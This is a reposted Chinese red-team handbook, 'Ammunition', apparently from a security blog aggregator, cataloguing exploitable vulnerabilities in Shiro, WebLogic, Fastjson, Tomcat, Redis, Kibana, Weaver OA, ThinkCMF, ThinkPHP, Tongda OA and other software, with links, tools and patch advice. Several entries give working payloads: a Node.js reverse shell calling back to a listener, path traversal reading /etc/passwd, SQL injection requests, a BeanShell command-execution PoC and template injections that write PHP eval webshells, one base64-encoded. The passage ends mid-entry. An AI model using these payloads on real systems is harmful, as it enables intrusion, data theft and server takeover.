Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:15853 篇
已收录公众号数量:90 个
本站文章为爬虫采集,如有侵权请告知
本周热门文章
Dibrary 第二季——好书推荐预告   2020.11.26 17:54:30  33
CVE-2020-14882​&14883:Weblogic RCE复现   2020.11.27 17:40:52  32
我拿到月薪3W的offer了   2020.11.29 22:20:04  31
CVE-2019-11580 RCE漏洞分析   2020.11.29 15:01:02  31
千万别把钱放在余额宝里!!!   2020.11.27 19:00:58  31
MySQL 漏洞利用与提权   2020.11.24 15:00:30  31
天融信科技集团正式完成公司更名   2020.11.26 10:45:21  30
已收录微信公众号
网安寻路人 网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
红队渗透手册之弹药篇
本文来自公众号:水滴安全实验室   2020.08.08 17:12:23


本篇为红队渗透手册系列的第二篇,刚上车的同学可以先温习一下第一篇


红队渗透手册之信息收集篇


攻防演练中最必不可少的就是日常exp的积累,在此给大家准备了一些危害大并且在平时的测试中常遇到的一些漏洞知识点,涉及的所有漏洞技能点均为自己复现加收集的公开资料。


shiro类



Apache shiro 反序列化漏洞

Shiro-550, Shiro-721

  1. 漏洞简介

    Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。

  2. 影响范围

    Apache Shiro <= 1.2.4 如果shiro的rememberMe功能的AES密钥被泄露, 就会导致反序列化漏洞,无论Shiro是什么版本。

  3. 漏洞特征

    set-Cookie: rememberMe=deleteMe 或者URL中有shiro字样,有一些时候服务器不会主动返回 rememberMe=deleteMe直接发包即可

  4. 漏洞复现

    Shiro RememberMe 1.2.4 反序列化漏洞详细复现

    https://www.cnblogs.com/paperpen/p/11312671.html

    Shiro反序列化漏洞利用汇总(Shiro-550+Shiro-721)

    https://www.cnblogs.com/xiaozi/p/13239046.html

    Shiro RememberMe 1.2.4反序列化导致的命令执行漏洞

    https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01

    Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现

    https://blog.csdn.net/qq_43645782/article/details/106028873

    Shiro 721 Padding Oracle攻击漏洞分析

    https://www.anquanke.com/post/id/193165

  5. 利用工具

    ShiroExploit

    https://github.com/feihong-cs/ShiroExploit

    Shiro_exploit

    https://github.com/insightglacier/Shiro_exploit/blob/master/shiro_exploit.py

  6. 防护方法

    升级Shiro到最新版 升级对应JDK版本到 8u191/7u201/6u211/11.0.1 以上 WAF拦截Cookie中长度过大的rememberMe值

Apache Shiro 权限绕过漏洞 (Shiro-682)

  1. 漏洞简介

    漏洞初始成因可以定位到 PathMatchingFilterChainResolver的getChain函数下,该函数作用根据URL路径匹配中配置的url路径表达式来匹配输入的URL,判断是否匹配拦截器,匹配成功将会返回响应的拦截器执行链,让ShiroFither执行权限操作。

  2. 影响范围

    Apache Shiro < 1.5.2

  3. 漏洞特征

    set-Cookie: rememberMe=deleteMe 或者URL中有shiro字样,有一些时候服务器不会主动返回 rememberMe=deleteMe 直接发包即可

  4. 漏洞复现

    Shiro权限绕过漏洞分析(CVE-2020-1957)

    https://www.freebuf.com/vuls/231909.html

  5. 防护方法

    升级1.5.2版本及以上 尽量避免使用通配符作为动态路由拦截器的URL路径表达式.

weblogic相关



Weblogic T3 反序列化漏洞

  1. 漏洞简介

    Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击.

  2. 影响范围

    Weblogic 10.3.6.0.0

    Weblogic 12.1.3.0.0

    Weblogic 12.2.1.3.0

  3. 漏洞特征

    可以根据weblogic的报错页面作为特征:

    The server has not found anything matching the Request-URI.No indication is given of whether the condition is temporary or permanent.······

  4. 漏洞复现

    Weblogic t3反序列化漏洞(CVE-2019-2890)分析

    http://gv7.me/articles/2019/cve-2019-2890-vulnerability-analysis/

    Weblogic T3协议反序列化漏洞(CVE-2018-2628)

    https://blog.csdn.net/Aaron_Miller/article/details/106657746

    相关漏洞包括:

    CVE-2017-3248

    https://paper.seebug.org/333/

    CVE-2018-2628

    https://paper.seebug.org/985/

    CVE-2018-2893

    https://www.freebuf.com/vuls/178105.html

    CVE-2019-2890

    https://paper.seebug.org/1069/

    CVE-2020-2555(Oracle Coherence)

    https://paper.seebug.org/1141/

  5. 利用工具

    weblogic 漏洞扫描工具

    https://github.com/0xn0ne/weblogicScanner

  6. 防护方法

    及时更新补丁 禁用T3协议 禁止T3端口对外开放, 或者限制可访问T3端口的IP来源

Weblogic XMLDecoder反序列化

  1. 漏洞简介

    WebLogic 中默认包含的 wls-wast 与 wls9_async_response war 包,由于以上 WAR 包采用 XMLDecoder 反序列化机制来处理发送过来的 XML 数据,远程恶意攻击者可以通过发送精心构造的 HTTP 请求,在未授权的情况下远程执行命令,获得目标服务器的权限。也就是说,攻击者能够直接获取服务器系统权限,进行数据窃取,进而甚至会威胁受害者的内网安全。

  2. 影响范围

    Oracle WebLogic Server10.3.6.0.0

    Oracle WebLogic Server12.1.3.0.0

    Oracle WebLogic Server12.2.1.1.0

    Oracle WebLogic Server12.2.1.3.0

  3. 漏洞特征

    /wls-wsat/CoordinatorPortType

    / async/AsyncResponseService

    / async/AsyncResponseServiceSoap12

  4. 漏洞复现

    WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

    https://blog.csdn.net/u013622866/article/details/104872747

    WebLogic-XMLDecoder反序列化分析

    https://hu3sky.github.io/2019/10/16/weblogic/

  5. 利用工具

    weblogicScanner

    https://github.com/0xn0ne/weblogicScanner

  6. 防护方法

    通过访问策略控制禁止外部/_async/* 及 /wls-wsat/*路径的URL访问

    删除对应war包并重启 webLogic

    限制源IP对应 weblogic 7001端口的访问

Fastjson反序列化



Fastjson 1.2.22 - 1.2.24 反序列化漏洞

  1. 漏洞简介

    FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

  2. 影响范围

    Fastjson 1.2.22 - 1.2.24

  3. 漏洞特征

    如果站点有原始报错回显,可以用不闭合花括号的方式进行报错回显,报错中往往会有fastjson的字样.(vulhub环境不适用)。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20'

    可以通过DNS回显的方式检测后端是否使用Fastjson。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'

    Java 系 Json 处理基本只有 Fastjson 和 Jackson,追加一个随机 key时jackson会报错。

    对使用fastjson的。Fastjson < 1.2.60 在取不到值的时候会填充 \u001a ,在1.2.60 进行了修复, 对 \x 后面的字符进行是否为16进制允许字符 (0-9a-fA-F) 的校验,所以这里就可以手动 padding ,构造一个特殊的字符串。

  4. 漏洞复现

    fastjson <= 1.2.24 反序列化漏洞分析

    https://www.secpulse.com/archives/73508.html

    fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录

    https://www.cnblogs.com/tr1ple/p/11431543.html

    fastjson 1.2.24反序列化漏洞深度分析

    https://www.anquanke.com/post/id/211035

  5. 如何利用

    https://mntn0x.github.io/2020/04/07/Fastjson%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

  6. 防护方法

    直接下载不受影响的新版本 阿里官方已经发布公告,建议受影响的用户立刻升级到1.2.28/1.2.29 或更高的版本,下载地址: http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.29/

Struts系列漏洞



  1. 漏洞简介

    Apache Struts2 作为世界上最流行的 Java Web 服务器框架之一,从出现漏洞至今虽然有些年头,但是仍然没有消失。

  2. 影响组件

    Struts

  3. 漏洞复现

    Struts2 历史 RCE 漏洞回顾不完全系列

    https://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities/

    浅谈struts2历史上的高危突破

    https://www.anquanke.com/post/id/86757

    strut2各版本漏洞信息整理

    https://www.zybuluo.com/Dukebf/note/821989

  4. 利用工具

    HatBoy/Struts2-Scan

    https://github.com/HatBoy/Struts2-Scan

    Struts2奇葩环境任意文件上传工具

    https://www.cnblogs.com/k8gege/p/10261217.html

  5. 防护方法

    升级到最新版 不建议使用Struts

Solr系列



  1. 组件描述

    Apache Solr是一个高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能的开源的搜索服务器。Solr为世界上许多最大的互联网站点提供搜索和导航功能。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache Solr 中存储的资源是以 Document 为对象进行存储的。每个文档由一系列的 Field 构成,每个 Field 表示资源的一个属性。Solr 中的每个 Document 需要有能唯一标识其自身的属性,默认情况下这个属性的名字是 id,在 Schema 配置文件中使用:

    <uniqueKey>id</uniqueKey>
  2. 影响组件

    solr

  3. 漏洞复现

    Solr系列漏洞复现

    https://www.jianshu.com/p/43e7f13e2058

  4. 利用工具

    k8gege/SolrExp

    https://github.com/k8gege/SolrExp

    1135/solr_exploit

    https://github.com/1135/solr_exploit

  5. 防护方法

    升级到最新版 不要对外开放敏感端口

Tomcat类



Tomcat 本地文件包含漏洞 (CVE-2020-1938)

  1. 漏洞简介

    Tomcat 是常见的Web 容器, 用户量非常巨大, Tomcat 8009 ajp端口一直是默认开放的

  2. 影响范围

    Apache Tomcat 6

    Apache Tomcat 7 < 7.0.100

    Apache Tomcat 8 < 8.5.51

    Apache Tomcat 9 < 9.0.31

  3. 漏洞特征

    tomcat/8009/ajp

    \x04\x01\xf4\x00\x15

  4. 漏洞复现

    CVE-2020-1938 幽灵猫( GhostCat ) Tomcat-Ajp 协议任意文件读取/JSP文件包含漏洞分析

    https://www.guildhab.top/?p=2406

    Apache Tomcat文件包含漏洞分析

    https://yinwc.github.io/2020/03/01/CVE-2020-1938/

    CVE-2020-1938:Tomcat AJP协议文件包含漏洞分析

    http://gv7.me/articles/2020/cve-2020-1938-tomcat-ajp-lfi/

  5. 检测工具

    bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner

    https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner

    长亭科技检测工具

    https://www.chaitin.cn/zh/ghostcat#download

  6. 防护方法

    更新为最新版本

    若不需要使用Tomcat AJP协议,可直接关闭AJP Connector,或将其监听地址改为仅监听本机localhost。

CVE-2020-9484 tomcat session反序列化漏洞分析

  1. 漏洞简介

    Apache Tomcat发布通告称修复了一个源于持久化Session的远程代码执行漏洞(CVE-2020-9484)。

    漏洞条件比较苛刻:

    tomcat必须启用session持久化功能FileStore

    tomcat/lib或者WEB-INF/lib目录下的依赖存在可用的gadget 3. 在服务器上存在已知路径文件内容可控

  2. 影响范围

    Apache Tomcat 10.x < 10.0.0-M5

    Apache Tomcat 9.x < 9.0.35

    Apache Tomcat 8.x < 8.5.55

    Apache Tomcat 7.x < 7.0.104

  3. 漏洞依赖条件

    配置session持久化

    conf/context.xml

    部署Gadgets jar包

    下载commons-collections4-4.0.jar 并放在tomcat lib/目录下

  4. 漏洞复现

    CVE-2020-9484 tomcat session反序列化漏洞分析与复现

    https://www.cnblogs.com/potatsoSec/p/12931427.html

    CVE-2020-9484 tomcat session反序列化漏洞分析与复现

    https://blog.csdn.net/Jietewang/article/details/106462903

  5. 漏洞利用

    tomcat-cluster-session-sync-exp

    https://github.com/threedr3am/tomcat-cluster-session-sync-exp

  6. 防护方法

    Apache Tomcat官方已经发布新版本修复上述漏洞,建议受影响用户尽快升级进行防护。不方便升级的用户,还可以暂时禁用FileStore功能,或者单独配置sessionAttributeValueClassNameFilte的值来确保只有特定属性的对象可以被序列化/反序列化。

Redis相关



  1. 漏洞简介

    部分 Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是 Redis 的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问 Redis 服务并进行相关操作。利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。

  2. 影响组件

    Redis

  3. 漏洞特征

    6379端口

  4. 漏洞复现

    Redis 未授权访问漏洞利用总结

    http://www.alloyteam.com/2017/07/12910/

    Redis未授权访问漏洞总结

    https://fragrant10.github.io/2019/02/13/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93.html

  5. 复现坑点分析

    r edis漏洞利用

    https://www.jianshu.com/p/2f56a58a1450

    redis 4.x/5.x未授权访问漏洞(以及一些环境搭建的坑)(7月18更新)

    http://www.mucn.site/index.php/Termux/210.html

  6. 防护方法

    redis数据库漏洞防护

    https://www.cnblogs.com/rinack/p/11099854.html

    redis未授权访问漏洞的利用和防护

    https://carey.akhack.com/2020/05/07/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E5%92%8C%E9%98%B2%E6%8A%A4/

Zabbix相关



  1. 漏洞简介

    Zabbix组件主要存在注入/弱口令/命令执行等类型的漏洞。

  2. 影响组件

    Zabbix

  3. 漏洞复现:

    信息收集 - Zabbix - 漏洞 - 汇总

    https://www.cnblogs.com/AtesetEnginner/p/12641747.html

    Zabbix(分布式系统监视)漏洞学习

    https://www.jianshu.com/p/85e3b0266158

    记一次zabbix安装及漏洞利用getshell全过程

    https://xz.aliyun.com/t/6874

    Zabbix 最新 SQL 注入漏洞及 EXP – Jamin Zhang

    https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP/

    最新Zabbix漏洞及其利用姿势(附EXP)

    https://zhuanlan.zhihu.com/p/22082375

  4. 防护方法

    https://www.bbsmax.com/A/QV5ZqlDeJy/

Jenkins相关



  1. 漏洞简介

    Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

  2. 影响组件

    Jenkins

  3. 漏洞特征

    Jenkins

  4. 漏洞复现

    Jenkins漏洞集合复现

    https://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/

    Jenkins任意文件读取漏洞分析

    https://www.freebuf.com/news/178808.html

  5. 漏洞利用

    blackye/Jenkins: Jenkins漏洞探测、用户抓取爆破

    https://github.com/blackye/Jenkins

    gquere/pwn_jenkins: Notes about attacking Jenkins servers

    https://github.com/gquere/pwn_jenkins

    Jenkins脏牛漏洞FRP内网提权

    https://www.freebuf.com/articles/web/215183.html

  6. 利用技巧

    可以在Jenkins 处进行内网信息收集, 获取的账号通常也是开发/运维级别的, 权限相对较大。

  7. 防护方法

    设置强口令 尽量不要开放到公网 限制来源IP 升级到最新版

Kibana相关



Kibana远程代码执行漏洞(CVE-2019-7609)

  1. 漏洞简介

    Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。

    攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

  2. 影响版本

    Kibana < 6.6.1

    Kibana < 5.6.15

  3. 检测方法

    文中给出了POC

    https://dylan903.github.io/2019/10/20/kibana-rce-lou-dong-fu-xian/

  4. 漏洞复现

    CVE-2019-7609 Kibana远程代码执行漏洞攻击方法和漏洞原理分析

    https://cloud.tencent.com/developer/article/1535121

    CVE-2019-7609 Kibana 代码执行漏洞复现

    http://blog.leanote.com/post/snowming/2cd6256df61d

  5. 漏洞利用

    jas502n/kibana-RCE

    https://github.com/jas502n/kibana-RCE

  6. 坑点

    部署过程中如果出现 Kibana server is not ready yet,那么你是需要确定下 你的kibana与elasticsearch版本是否一致

    es要用非root用户启动,否则会报 can not run elasticsearch as root 错误。

  7. 防御方法

    升级Kibana至新版本

Kibana漏洞CVE-2018-17246

  1. 漏洞简介

    此漏洞出现在Kibana控制台(Console)插件中,控制台插件是KIbana的基本插件,也就是Kibana必装的插件。当前elastic最新版本为6.5,可以说大部分elk的组件会存在此问题,但是此问题利用难点在于如何创建一个恶意的本地文件。

  2. 影响版本

    ElasticSearch Kibana < 6.4.3

    ElasticSearch Kibana < 5.6.13

  3. 利用方法

    读文件操作

    http://192.168.1.3:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

    反弹shell 在kibana的机器创建 /tmp/shell.js

    (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "192.168.1.2", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

    请求包含刚刚创建的shell:

    http://192.168.1.3:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js

  4. 本地监听:

    nc -l 8080 -v

  5. 漏洞复现

    Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)

    https://www.anquanke.com/post/id/168291

    ELK LFI CVE-2018-17246

    https://wh0ale.github.io/2018/12/18/2018-12-18-ELK%20LFI%20CVE-2018-17246/

  6. 坑点

    最终漏洞的影响关键在于如何创建shell文件。

  7. 修复建议

    目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

    https://access.redhat.com/security/cve/cve-2018-17246

泛微OA相关



泛微OA系统多版本存在命令执行漏洞

  1. 漏洞简介

    泛微OA办公系统是一款协调办公软件。

    泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

  2. 影响范围

    泛微 e-cology<=9.0

  3. 漏洞复现

    https://www.cnblogs.com/Sylon/p/11765543.html

  4. Poc

    漏洞路径:/weaver/bsh.servlet.BshServlet

    exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec( " whoami " )");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

  5. 批量检测工具

    https://github.com/sunird/e-cology-poc

  6. 防护方法

    屏蔽/weaver/*目录的访问;

    https://www.weaver.com.cn/cs/securityDownload.asp

泛微E-cology OA系统SQL注入漏洞

  1. 漏洞简介

    泛微e-cology OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时,由于内置SQL语句拼接不严,导致泛微e-cology OA系统存在SQL注入漏洞。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的SQL语句,从而获取数据库敏感信息。

  2. 影响范围

    泛微e-cology<=9.0

  3. 漏洞复现

    泛微生态OA系统SQL注入扩展复现

    https://mumuka.gitee.io/passages/%E6%B3%9B%E5%BE%AEe-cology%20OA%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

    泛微 e-cology OA 前台SQL注入漏洞复现

    https://cloud.tencent.com/developer/article/1521764

  4. 简易poc

    POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1

    Host: ip:port

    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

    Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded

    Content-Length: 2236

    Connection: close

    Upgrade-Insecure-Requests: 1

    formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1

  5. 利用工具

    AdministratorGithub/e-cology-OA-SQL

    https://github.com/AdministratorGithub/e-cology-OA-SQL

    mmioimm/ecology_test

    https://github.com/mmioimm/ecology_test

  6. 防护方法

    及时打补丁

    泛微官方安全补丁: https://www.weaver.com.cn/cs/securityDownload.asp

Thinkcmf相关



前台SQL注入:

  1. 依赖条件

    需要普通用户权限,默认可注册

  2. payload:

    POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1

    Host: localhost

    Connection: close

    Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 79

post id =bind&post id =0 and updatexml(1, concat(0x7e,user(),0x7e),1)--+-

前台模版注入漏洞-可getshell四处

(仅在windows环境下设置)

第一处

http://website/ThinkCMFX/index.php?g=Comment&m=Widget&a=fetch&templateFile=/../public/index&content= <%3fphp+file_put_contents('m.php','<%3fphp+eval($ POST[ ])%3b');?>&prefix=

第二处 http://website/ThinkCMFX/index.php?g=Api&m=Plugin&a=fetch&templateFile=/../../../public/index&content= <%3fphp+file_put_contents('m.php','<%3fphp+eval($ POST[ ])%3b');?>&prefix=

第三处 /index.php?a=fetch&templateFile=public/index&prefix=''&content= <php> file_put_contents('test.php',' <?php phpinfo(); ?> ') </php>

第四处 /index.php?a=fetch&content=<?php+file_put_contents("mrxn.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbIjAwMCJdKTs/Pg=="));

任意文件删除-只能windows删除

在用户上传头像处存在任意文件删除漏洞,发送如下数据包后,会删除网站根目录下一个名为 test.txt 的文件。(该漏洞仅能在 Windows 下触发)

POST /ThinkCMFX/index.php?g=User&m=Profile&a=do_avatar& HTTP/1.1

Host: localhost

Cookie: PHPSESSID=bggit7phrb1dl99pcb2lagbmq0;

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

imgurl=.. . . . .\test.txt

任意文件上传

在 ThinkCMFX2.2.3 最终版中,存在一处任意文件上传(需要普通用户权限,默认可注册)

curl -F "file=@/tmp/shell.php" -X "POST" -b 'PHPSESSID=qekmttucmue6vv41kpdjghnkd0;' ' http://127.0.0.1/ThinkCMFX/index.php?g=Asset&m=Ueditor&a=upload&action=uploadfile '

任意文件包含(读取数据库配置等等)

/index.php?a=display&templateFile=README.md

深信服VPN相关



  1. 漏洞简介

    深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过

  2. 影响组件

    深信服 VPN

  3. 漏洞指纹

    Set-Cookie: TWFID=welcome to ssl vpn Sinfor

  4. Fofa Dork

    header="Set-Cookie: TWFID="

  5. 漏洞分析

    深信服vpnweb登录逆向学习 – potatso – 博客园

    https://www.cnblogs.com/potatsoSec/p/12326356.html

  6. 漏洞利用

    (简单的命令注入)

    wget -t %d -T %d --spider %s

  7. 利用技巧

    该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网

    该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来

    去除空格也简单 cat /etc/passwd | tr " \n" "+|"

  8. 防护方法

    及时更新补丁 升级到最新版

Thinkphp相关



ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell

  1. 影响版本

    <= 3.2.3

  2. 漏洞复现

    https://xz.aliyun.com/t/99

    https://xz.aliyun.com/t/99

ThinkPHP3.2.3_最新版update注入漏洞

  1. 影响版本

    <= 3.2.3

  2. 漏洞复现

    https://www.anquanke.com/post/id/104847

ThinkPHP3.2.X_find_select_delete注入

  1. 影响版本

    <= 3.2.3

2 .漏洞复现

https://xz.aliyun.com/t/2631 https://xz.aliyun.com/t/2629

ThinkPHP3.X_order_by注入漏洞

  1. 影响版本

    <= 3.2.3

  2. 漏洞复现

    https://cloud.tencent.com/developer/news/305625

ThinkPHP5_SQL注入漏洞&&敏感信息泄露

  1. 影响版本

    < 5.0.9

  2. 漏洞复现

    https://xz.aliyun.com/t/125 > < https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell

  1. 影响版本

    < 5.0.11

  2. 漏洞复现

    https://xz.aliyun.com/t/99

ThinkPHP框架5.0.X_sql注入漏洞分析

  1. 影响版本

    < 5.0.16

2.  漏洞复现

https://xz.aliyun.com/t/2257

ThinkPHP5.X_order_by注入漏洞

  1. 影响版本

    <= 5.1.22

  2. 漏洞复现

    https://www.cnblogs.com/wangtanzhi/p/12741498.html

ThinkPHP5.X_远程代码执行

  1. 影响版本

    5.0.5-5.0.22

    5.1.0-5.1.30

  2. 漏洞复现

    https://xz.aliyun.com/t/3570 https://paper.seebug.org/760 https://paper.seebug.org/770

通达OA相关



通达OA任意用户登录漏洞

1.漏洞简介

通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

2.影响范围

通达OA2017

通达OA V11.x<V11.5

3.漏洞指纹

/static/templates/2017_01/userName.png

Office Anywhere 20xx版 网络智能办公系统

/ispirit/interface/gateway.php

4.漏洞利用工具

https://github.com/NS-Sp4ce/TongDaOA-Fake-User

https://github.com/zrools/tools/blob/master/python/tongda_v11.4_rce_exp.py

5.详细文章

https://www.cnblogs.com/lovequitepcs/p/12864203.html

6.利用技巧与坑点

可以使用chrome的EditThisCookie插件修改cookie,修改cookies别忘记访问,否则无法登录成功

/general/index.php?isIB=0&modify_pwd=0

7.防护方法

升级通达oa到最新版本

通达OA命令执行漏洞

1.漏洞简介

通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

2.影响范围

通达OA V11版

通达OA 2017版

通达OA 2016版

通达OA 2015版

通达OA 2013增强版

通达OA 2013版

3.漏洞利用工具

https://github.com/jas502n/OA-tongda-RCE

4.详细文章

https://zhuanlan.zhihu.com/p/114264570

5.防护方法

更新通达oa最新补丁

安全更新地址: http://www.tongda2000.com/news/673.php

通达OA扫码登录任意用户登录

1.漏洞简介

通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

2.影响范围

通达OA v2017、v11.x < v11.5 支持扫码登录版本

3.漏洞分析文章

https://xz.aliyun.com/t/7704#toc-4

Coremail漏洞相关



  1. 漏洞简介

    Coremail邮件系统配置文件信息泄露漏洞

  2. Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。

    截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

  3. 利用方式

    http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/

    浏览器请求访问,即可查看配置文件信息。

  4. 修复方法

    更新Coremail版本或联系厂家修复

SaltStack漏洞相关



  1. 漏洞简介

    SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能。

  2. 影响范围:

    SaltStack < 2019.2.4

    SaltStack < 3000.2

  3. 漏洞利用工具

    Saltstack远程命令执行漏洞EXP

https://github.com/Imanfeng/SaltStack-Exp.git
  1. 详细文章

    https://www.cnblogs.com/Cl0wn/p/12918432.html

  2. 修复方法

    更新版本

    SaltStack = 2019.2.4

    SaltStack = 3000.2

    https://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7

    https://github.com/saltstack/salt/commit/d5801df94b05158dc8e48c5e6912b065044720f3

致远OA漏洞相关



  1. 漏洞简介

